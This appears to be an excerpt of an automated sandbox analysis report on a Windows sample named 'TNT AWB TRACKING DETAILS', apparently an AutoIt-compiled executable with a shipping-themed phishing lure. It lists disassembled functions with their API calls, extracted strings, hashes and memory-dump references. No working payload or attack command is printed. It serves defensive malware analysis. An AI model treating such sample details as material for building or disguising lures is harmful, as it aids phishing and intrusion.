                                                    • API ID: BuffCharUpperVisibleWindow
                                                    • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                    • API String ID: 4105515805-45149045
                                                    • Opcode ID: 33a64a659ef205bad7dd27aceb98fa58d24512bdb706a7bf9bfc553892af80f4
                                                    • Instruction ID: b71a978dc54403d3795ee84fedab0dd59b6d50a3270a06fbb443407280951df0
                                                    • Opcode Fuzzy Hash: 33a64a659ef205bad7dd27aceb98fa58d24512bdb706a7bf9bfc553892af80f4
                                                    • Instruction Fuzzy Hash: 15D182312083059BCB04EF10C955E6E7BE1AF95354F154468FC896B3A3CB75EE8AEB42
                                                    Function 00F4A5DA Relevance: 49.8, APIs: 33, Instructions: 260COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetTextColor.GDI32(?,00000000), ref: 00F4A630
                                                    • GetSysColorBrush.USER32(0000000F), ref: 00F4A661
                                                    • GetSysColor.USER32(0000000F), ref: 00F4A66D
                                                    • SetBkColor.GDI32(?,000000FF), ref: 00F4A687
                                                    • SelectObject.GDI32(?,00000000), ref: 00F4A696
                                                    • InflateRect.USER32(?,000000FF,000000FF), ref: 00F4A6C1
                                                    • GetSysColor.USER32(00000010), ref: 00F4A6C9
                                                    • CreateSolidBrush.GDI32(00000000), ref: 00F4A6D0
                                                    • FrameRect.USER32(?,?,00000000), ref: 00F4A6DF
                                                    • DeleteObject.GDI32(00000000), ref: 00F4A6E6
                                                    • InflateRect.USER32(?,000000FE,000000FE), ref: 00F4A731
                                                    • FillRect.USER32(?,?,00000000), ref: 00F4A763
                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00F4A78E
                                                      • Part of subcall function 00F4A8CA: GetSysColor.USER32(00000012), ref: 00F4A903
                                                      • Part of subcall function 00F4A8CA: SetTextColor.GDI32(?,?), ref: 00F4A907
                                                      • Part of subcall function 00F4A8CA: GetSysColorBrush.USER32(0000000F), ref: 00F4A91D
                                                      • Part of subcall function 00F4A8CA: GetSysColor.USER32(0000000F), ref: 00F4A928
                                                      • Part of subcall function 00F4A8CA: GetSysColor.USER32(00000011), ref: 00F4A945
                                                      • Part of subcall function 00F4A8CA: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00F4A953
                                                      • Part of subcall function 00F4A8CA: SelectObject.GDI32(?,00000000), ref: 00F4A964
                                                      • Part of subcall function 00F4A8CA: SetBkColor.GDI32(?,00000000), ref: 00F4A96D
                                                      • Part of subcall function 00F4A8CA: SelectObject.GDI32(?,?), ref: 00F4A97A
                                                      • Part of subcall function 00F4A8CA: InflateRect.USER32(?,000000FF,000000FF), ref: 00F4A999
                                                      • Part of subcall function 00F4A8CA: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00F4A9B0
                                                      • Part of subcall function 00F4A8CA: GetWindowLongW.USER32(00000000,000000F0), ref: 00F4A9C5
                                                      • Part of subcall function 00F4A8CA: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00F4A9ED
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                    • String ID:
                                                    • API String ID: 3521893082-0
                                                    • Opcode ID: d898fb3aebd6c722afbcc7b9d380e64f3d112eab171bc20d89deee1431608430
                                                    • Instruction ID: b346adef4dff313a506e4c6934392222f22b77287bd63b7e65d394c318654828
                                                    • Opcode Fuzzy Hash: d898fb3aebd6c722afbcc7b9d380e64f3d112eab171bc20d89deee1431608430
                                                    • Instruction Fuzzy Hash: B2919C76408309EFD7109F64DC08A5BBBA9FF8A331F140A29FD66D61A1D734D848EB52
                                                    Function 00F374AB Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 284windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • DestroyWindow.USER32(00000000), ref: 00F374DE
                                                    • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00F3759D
                                                    • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 00F375DB
                                                    • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 00F375ED
                                                    • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00F37633
                                                    • GetClientRect.USER32(00000000,?), ref: 00F3763F
                                                    • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00F37683
                                                    • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00F37692
                                                    • GetStockObject.GDI32(00000011), ref: 00F376A2
                                                    • SelectObject.GDI32(00000000,00000000), ref: 00F376A6
                                                    • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 00F376B6
                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00F376BF
                                                    • DeleteDC.GDI32(00000000), ref: 00F376C8
                                                    • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00F376F4
                                                    • SendMessageW.USER32(00000030,00000000,00000001), ref: 00F3770B
                                                    • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00F37746
                                                    • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00F3775A
                                                    • SendMessageW.USER32(00000404,00000001,00000000), ref: 00F3776B
                                                    • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 00F3779B
                                                    • GetStockObject.GDI32(00000011), ref: 00F377A6
                                                    • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00F377B1
                                                    • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 00F377BB
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                    • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                    • API String ID: 2910397461-517079104
                                                    • Opcode ID: 117924e3ce760041454972b2862fcf828d9d31f26196287261f55ae7d206caf7
                                                    • Instruction ID: ee4e208fb366351705af334f243796f4e833f2ca94681c440b13924f29fca147
                                                    • Opcode Fuzzy Hash: 117924e3ce760041454972b2862fcf828d9d31f26196287261f55ae7d206caf7
                                                    • Instruction Fuzzy Hash: 95A180B5A40609BFEB14DBA4DD4AFAF7BB9EB09710F004114FA15A72E0CB70AD05DB64
                                                    Function 00F2AD10 Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 186COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetErrorMode.KERNEL32(00000001), ref: 00F2AD1E
                                                    • GetDriveTypeW.KERNEL32(?,00F4FAC0,?,\\.\,00F4F910), ref: 00F2ADFB
                                                    • SetErrorMode.KERNEL32(00000000,00F4FAC0,?,\\.\,00F4F910), ref: 00F2AF59
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: ErrorMode$DriveType
                                                    • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                    • API String ID: 2907320926-4222207086
                                                    • Opcode ID: de6f88f97389e11730f7fbca24e1cb2e535aa05c83de55d4ed00c3785362395e
                                                    • Instruction ID: 02afdc6f97a26e6f85d5344f19dd73ad83300fa3d393c6c23c2fa43694da8d79
                                                    • Opcode Fuzzy Hash: de6f88f97389e11730f7fbca24e1cb2e535aa05c83de55d4ed00c3785362395e
                                                    • Instruction Fuzzy Hash: 0D5194B2A84215EBCB10DB14EA46EBD77A1EB48750720805BE40BB7291DA79DD43FB43
                                                    Function 00EC68DC Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 275COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: __wcsnicmp
                                                    • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                    • API String ID: 1038674560-86951937
                                                    • Opcode ID: 1c5fbf14b32fb563d9561fa0c2c2589df93ff8594947de781ef93c0353448991
                                                    • Instruction ID: db7cb28b2dca08fd6023da78115ecabaf9610017751fab2a17c013541bf6cb92
                                                    • Opcode Fuzzy Hash: 1c5fbf14b32fb563d9561fa0c2c2589df93ff8594947de781ef93c0353448991
                                                    • Instruction Fuzzy Hash: 49811A716002096ACF10AE61DD47FBF3BA8EF45704F046029FD05BB192EB72EE46D651
                                                    Function 00F49A1C Relevance: 42.5, APIs: 23, Strings: 1, Instructions: 455windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000103,?,?,?), ref: 00F49AD2
                                                    • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00F49B8B
                                                    • SendMessageW.USER32(?,00001102,00000002,?), ref: 00F49BA7
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$Window
                                                    • String ID: 0
                                                    • API String ID: 2326795674-4108050209
                                                    • Opcode ID: 514cd74ef75b017b74de47b18b7b9cc6d95c8b0f51bf48fe6cc1bfc650d529c7
                                                    • Instruction ID: c9939e4c40123a9950f45305a04bb00bcf0bd6e6bc89fd077c3b6955726c8226
                                                    • Opcode Fuzzy Hash: 514cd74ef75b017b74de47b18b7b9cc6d95c8b0f51bf48fe6cc1bfc650d529c7
                                                    • Instruction Fuzzy Hash: 2802DE31608201AFD725CF14C888BABBFE4FF59324F04852DFD99962A1C7B5D948EB52
                                                    Function 00F4A8CA Relevance: 39.2, APIs: 26, Instructions: 187windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetSysColor.USER32(00000012), ref: 00F4A903
                                                    • SetTextColor.GDI32(?,?), ref: 00F4A907
                                                    • GetSysColorBrush.USER32(0000000F), ref: 00F4A91D
                                                    • GetSysColor.USER32(0000000F), ref: 00F4A928
                                                    • CreateSolidBrush.GDI32(?), ref: 00F4A92D
                                                    • GetSysColor.USER32(00000011), ref: 00F4A945
                                                    • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00F4A953
                                                    • SelectObject.GDI32(?,00000000), ref: 00F4A964
                                                    • SetBkColor.GDI32(?,00000000), ref: 00F4A96D
                                                    • SelectObject.GDI32(?,?), ref: 00F4A97A
                                                    • InflateRect.USER32(?,000000FF,000000FF), ref: 00F4A999
                                                    • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00F4A9B0
                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 00F4A9C5
                                                    • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00F4A9ED
                                                    • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00F4AA14
                                                    • InflateRect.USER32(?,000000FD,000000FD), ref: 00F4AA32
                                                    • DrawFocusRect.USER32(?,?), ref: 00F4AA3D
                                                    • GetSysColor.USER32(00000011), ref: 00F4AA4B
                                                    • SetTextColor.GDI32(?,00000000), ref: 00F4AA53
                                                    • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 00F4AA67
                                                    • SelectObject.GDI32(?,00F4A5FA), ref: 00F4AA7E
                                                    • DeleteObject.GDI32(?), ref: 00F4AA89
                                                    • SelectObject.GDI32(?,?), ref: 00F4AA8F
                                                    • DeleteObject.GDI32(?), ref: 00F4AA94
                                                    • SetTextColor.GDI32(?,?), ref: 00F4AA9A
                                                    • SetBkColor.GDI32(?,?), ref: 00F4AAA4
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                    • String ID:
                                                    • API String ID: 1996641542-0
                                                    • Opcode ID: 7a01d8ca96b3cbafcfe9571e0625ec7d1fad0b58d716cc057081bc4688085e44
                                                    • Instruction ID: caeca86ede2254d6a2064275d6bb8be35a8396a86d1349381bc3307482cbc1d7
                                                    • Opcode Fuzzy Hash: 7a01d8ca96b3cbafcfe9571e0625ec7d1fad0b58d716cc057081bc4688085e44
                                                    • Instruction Fuzzy Hash: 5E514A76900208FFDB109FA4DC48EAEBBB9EF49320F114225FD15AB2A1D7759944EF90
                                                    Function 00F489D5 Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 401windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00F48AC1
                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00F48AD2
                                                    • CharNextW.USER32(0000014E), ref: 00F48B01
                                                    • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00F48B42
                                                    • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00F48B58
                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00F48B69
                                                    • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00F48B86
                                                    • SetWindowTextW.USER32(?,0000014E), ref: 00F48BD8
                                                    • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00F48BEE
                                                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 00F48C1F
                                                    • _memset.LIBCMT ref: 00F48C44
                                                    • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00F48C8D
                                                    • _memset.LIBCMT ref: 00F48CEC
                                                    • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00F48D16
                                                    • SendMessageW.USER32(?,00001074,?,00000001), ref: 00F48D6E
                                                    • SendMessageW.USER32(?,0000133D,?,?), ref: 00F48E1B
                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 00F48E3D
                                                    • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00F48E87
                                                    • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00F48EB4
                                                    • DrawMenuBar.USER32(?), ref: 00F48EC3
                                                    • SetWindowTextW.USER32(?,0000014E), ref: 00F48EEB
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                    • String ID: 0
                                                    • API String ID: 1073566785-4108050209
                                                    • Opcode ID: 83c7bbf7b32cc40f66ac82420aa528daac3ce60a4cb8ddba5fd6f094a90a8241
                                                    • Instruction ID: b69d9f1fab957a4e8e7ad67e38d562f46664a0aecb350023227b83b6b4d771a0
                                                    • Opcode Fuzzy Hash: 83c7bbf7b32cc40f66ac82420aa528daac3ce60a4cb8ddba5fd6f094a90a8241
                                                    • Instruction Fuzzy Hash: 78E18375901209AFDF209F50CC84EEE7FB9EF067A0F108156FE19AA190DB749985EF60
                                                    Function 00F4488F Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetCursorPos.USER32(?), ref: 00F449CA
                                                    • GetDesktopWindow.USER32 ref: 00F449DF
                                                    • GetWindowRect.USER32(00000000), ref: 00F449E6
                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00F44A48
                                                    • DestroyWindow.USER32(?), ref: 00F44A74
                                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00F44A9D
                                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00F44ABB
                                                    • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00F44AE1
                                                    • SendMessageW.USER32(?,00000421,?,?), ref: 00F44AF6
                                                    • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00F44B09
                                                    • IsWindowVisible.USER32(?), ref: 00F44B29
                                                    • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00F44B44
                                                    • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00F44B58
                                                    • GetWindowRect.USER32(?,?), ref: 00F44B70
                                                    • MonitorFromPoint.USER32(?,?,00000002), ref: 00F44B96
                                                    • GetMonitorInfoW.USER32(00000000,?), ref: 00F44BB0
                                                    • CopyRect.USER32(?,?), ref: 00F44BC7
                                                    • SendMessageW.USER32(?,00000412,00000000), ref: 00F44C32
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                    • String ID: ($0$tooltips_class32
                                                    • API String ID: 698492251-4156429822
                                                    • Opcode ID: daaf030d629a9f8d6e3b4a0b19750f974e3617ef45dc750fb2a79b3845d3aaef
                                                    • Instruction ID: 181dab2ba034859f8dd8e5192a529d947ab9d1a56a6fea6f44837a39a432387c
                                                    • Opcode Fuzzy Hash: daaf030d629a9f8d6e3b4a0b19750f974e3617ef45dc750fb2a79b3845d3aaef
                                                    • Instruction Fuzzy Hash: A7B18C71604340AFDB04DF64C988B6ABBE4FF89710F00891CF999AB2A1DB75EC05DB55
                                                    Function 00F2449A Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 179COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetFileVersionInfoSizeW.VERSION(?,?), ref: 00F244AC
                                                    • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00F244D2
                                                    • _wcscpy.LIBCMT ref: 00F24500
                                                    • _wcscmp.LIBCMT ref: 00F2450B
                                                    • _wcscat.LIBCMT ref: 00F24521
                                                    • _wcsstr.LIBCMT ref: 00F2452C
                                                    • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00F24548
                                                    • _wcscat.LIBCMT ref: 00F24591
                                                    • _wcscat.LIBCMT ref: 00F24598
                                                    • _wcsncpy.LIBCMT ref: 00F245C3
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                                                    • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                    • API String ID: 699586101-1459072770
                                                    • Opcode ID: fa1222399727b4da7e77874cc52793f5f06fecdbb2077d645f70dad6983b161f
                                                    • Instruction ID: a23cced8229fc83965a460bb1aa72670f140706201fcc7617db9620554152883
                                                    • Opcode Fuzzy Hash: fa1222399727b4da7e77874cc52793f5f06fecdbb2077d645f70dad6983b161f
                                                    • Instruction Fuzzy Hash: 8741F9329402587BDB10AB759C07FBF7BECDF41710F04006AFA05F6182EA75E901A6A6
                                                    Function 00EC27D9 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 286windowtimeCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00EC28BC
                                                    • GetSystemMetrics.USER32(00000007), ref: 00EC28C4
                                                    • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00EC28EF
                                                    • GetSystemMetrics.USER32(00000008), ref: 00EC28F7
                                                    • GetSystemMetrics.USER32(00000004), ref: 00EC291C
                                                    • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00EC2939
                                                    • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00EC2949
                                                    • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00EC297C
                                                    • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00EC2990
                                                    • GetClientRect.USER32(00000000,000000FF), ref: 00EC29AE
                                                    • GetStockObject.GDI32(00000011), ref: 00EC29CA
                                                    • SendMessageW.USER32(00000000,00000030,00000000), ref: 00EC29D5
                                                      • Part of subcall function 00EC2344: GetCursorPos.USER32(?), ref: 00EC2357
                                                      • Part of subcall function 00EC2344: ScreenToClient.USER32(00F857B0,?), ref: 00EC2374
                                                      • Part of subcall function 00EC2344: GetAsyncKeyState.USER32(00000001), ref: 00EC2399
                                                      • Part of subcall function 00EC2344: GetAsyncKeyState.USER32(00000002), ref: 00EC23A7
                                                    • SetTimer.USER32(00000000,00000000,00000028,00EC1256), ref: 00EC29FC
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                    • String ID: AutoIt v3 GUI
                                                    • API String ID: 1458621304-248962490
                                                    • Opcode ID: 3eef37739d99e755cd71dff1180434bb2d19f66d265fd6aef343e679c6504b65
